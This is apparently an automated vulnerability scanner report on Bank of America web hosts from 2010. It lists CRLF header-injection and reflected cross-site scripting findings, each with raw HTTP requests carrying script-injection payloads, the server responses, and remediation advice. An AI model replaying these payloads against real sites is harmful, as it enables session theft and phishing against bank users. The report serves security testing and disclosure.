HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:39:37 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=DBDFA9AF2A1E66F354A8EEDFA09835C2.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/scripts/8aa0a d97d3fd8580?shouldTest=true Content-Language: en-US Content-Length: 0 Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 64aea%0d%0a421b0c465aa was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/scripts/64aea%0d%0a421b0c465aa HTTP/1.1 Host: locators.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; testCookie=INFONOW_TEST_COOKIE_SUPPORT
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:41:13 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=8EEBEF7081112FC696D0E53A06D05270.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/scripts/64aea 421b0c465aa?shouldTest=true Content-Language: en-US Content-Length: 0 Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 13e21%0d%0aef994c8ebc5 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/scripts/13e21%0d%0aef994c8ebc5 HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:41:31 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=E37AAA18953C8032D2F8AE9D3FFFD42C.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/scripts/13e21 ef994c8ebc5?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 4ac3f%0d%0a1deb0dad158 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
The value of REST URL parameter 4 is copied into the Location response header. The payload c5539%0d%0a8cae31cecfc was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cebd"><script>alert(1)</script>57150e6abf5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /surveys3cebd"><script>alert(1)</script>57150e6abf5/bridge/surveybridge.cfm HTTP/1.1 Host: www-stage.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:32:32 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1237d"><script>alert(1)</script>8f718c1fda1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /surveys/bridge1237d"><script>alert(1)</script>8f718c1fda1/surveybridge.cfm HTTP/1.1 Host: www-stage.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:32:33 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b512"><script>alert(1)</script>c93e6d5e29e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:29:25 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3217471147.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bba4"><script>alert(1)</script>c820a75737a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:28:35 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3066476203.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41bd5"><script>alert(1)</script>aae9f92104b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:32:19 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3871717035.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b24d4"><script>alert(1)</script>d2eaa788593 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /depositsb24d4"><script>alert(1)</script>d2eaa788593/checksave/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; BIGipServerngen-www.80=423999147.20480.0000; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; cookiecheck=enabled; CFTOKEN=380c459%2D0003ce88%2D78cf%2D1ced%2Daea6%2D834712e34552; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; NSC_CbolPgBnfsjdb=445b320a7852; GEOSERVER=2; cmTPSet=Y; CFID=130456778; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 20:53:33 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=2812655275.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0c6"><script>alert(1)</script>55e7e409f2e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /deposits/checksavebf0c6"><script>alert(1)</script>55e7e409f2e/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; BIGipServerngen-www.80=423999147.20480.0000; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; cookiecheck=enabled; CFTOKEN=380c459%2D0003ce88%2D78cf%2D1ced%2Daea6%2D834712e34552; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; NSC_CbolPgBnfsjdb=445b320a7852; GEOSERVER=2; cmTPSet=Y; CFID=130456778; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 20:53:33 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=430356139.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd211"><script>alert(1)</script>d4778b6e8eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:32:10 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=533116587.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a202"><script>alert(1)</script>0673ee98330 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:31:57 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=2865084075.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd32a"><script>alert(1)</script>215c12e683e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:28:54 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3066476203.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d948"><script>alert(1)</script>a79bd16ba3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /help3d948"><script>alert(1)</script>a79bd16ba3a/equalhousing_popup.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; BIGipServerngen-www.80=423999147.20480.0000; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; cookiecheck=enabled; CFTOKEN=380c459%2D0003ce88%2D78cf%2D1ced%2Daea6%2D834712e34552; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; NSC_CbolPgBnfsjdb=445b320a7852; GEOSERVER=2; cmTPSet=Y; CFID=130456778; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 20:53:40 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3014047403.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea3d3"><script>alert(1)</script>46a5c28b748 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /helpea3d3"><script>alert(1)</script>46a5c28b748/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; BIGipServerngen-www.80=423999147.20480.0000; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; cookiecheck=enabled; CFTOKEN=380c459%2D0003ce88%2D78cf%2D1ced%2Daea6%2D834712e34552; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; NSC_CbolPgBnfsjdb=445b320a7852; GEOSERVER=2; cmTPSet=Y; CFID=130456778; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 20:53:41 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3265705643.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of the lob request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fc5"%20a%3db%205d4cdd78f3a was submitted in the lob parameter. This input was echoed as f1fc5" a=b 5d4cdd78f3a in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:33:14 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=CT; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; path=/; domain=.bankofamerica.com; Connection: close Set-Cookie: BIGipServerngen-www.80=3016144555.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9366"><script>alert(1)</script>be4afee3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:29:23 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3066476203.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c303d"><script>alert(1)</script>963d43becfe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:31:58 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3116807851.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f34a6"><script>alert(1)</script>c6095419bb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:29:30 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=482784939.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a880"><script>alert(1)</script>fc53412051f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:29:26 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3217471147.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c89f"><script>alert(1)</script>3e70e68babd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:29:27 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1657190059.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66753"><script>alert(1)</script>13479fe01e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:29:27 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3167139499.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71274"><script>alert(1)</script>89a018ce887 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc060"><script>alert(1)</script>cbaa16c497d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:29:49 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3972380331.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8753f"><script>alert(1)</script>ec32a540abb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
